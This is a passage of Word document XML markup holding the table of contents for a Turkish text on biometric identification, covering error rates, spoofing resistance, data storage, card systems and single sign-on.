              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Biyometrik Tanımlama</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979158 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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59" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Biyometrik Gelişime Giden Geçmiş ve Tarihçe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979159 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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0" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 . Biyometrik Gelişim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979160 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</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1" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3. Biyometrik Sistemlerin Özellikleri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979161 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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2" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4. Doğruluk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979162 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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3" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5. Yanlış Reddetme Oranı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979163 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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4" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6. Yanlış Kabul Oranı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979164 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>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5" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7. Çapraz Hata Oranı (CER)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979165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6" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7. Hız ve verim oranı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979166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7" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7. Kullanıcılara Kabul Edilebilirlik</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979167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8" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.8. Biyometrik Organ ve Eylemin Tekliği</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979168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69" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.9. Sahteciliğe Karşı Direnç</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979169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0" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.10. Güvenilirlik</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979170 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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1" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.11. Data Storage Requirements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979171 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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2" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.11. Kayıt Süresi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979172 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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3" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.12. Veri Toplamanın Saldırganlığı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979173 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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4" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.12. Konu ve Sistem Temas Gereksinimleri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979174 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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5" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.13. Tarihsel Biyometrik Problemler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979175 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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6" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.14. Performans</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979176 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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7" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.15. Donanım ve Yazılım Sağlamlığı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979177 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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8" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.16. Maintenance Requirements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979178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79" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.17. Sabotaj Duyarlılığı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979179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0" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.18. Kullanım Nedeniyle Algılanan Sağlık Maladies</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979180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1" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.19. Yönetime Sunulan Özel Bilgiler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979181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2" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.20. Kart Sistemlerine Göre Biyometrik Tanımlamanın Özellikleri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979182 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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3" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.21. Kart Sistemi Hata Oranları</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979183 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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4" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.22. Biyometrik Veri Güncellemeleri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979184 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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5" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.23. Farklı Biyometrik Sistem Çeşitleri ve Özellikleri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979185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6" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.24. Information Security Applications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979186 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</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7" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.25.Özet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979187 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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8" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Kuruluş için Tekli Oturum Açma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979188 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2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89" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1. Evrim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9979189 \h </w:instrText>
            </w:r>
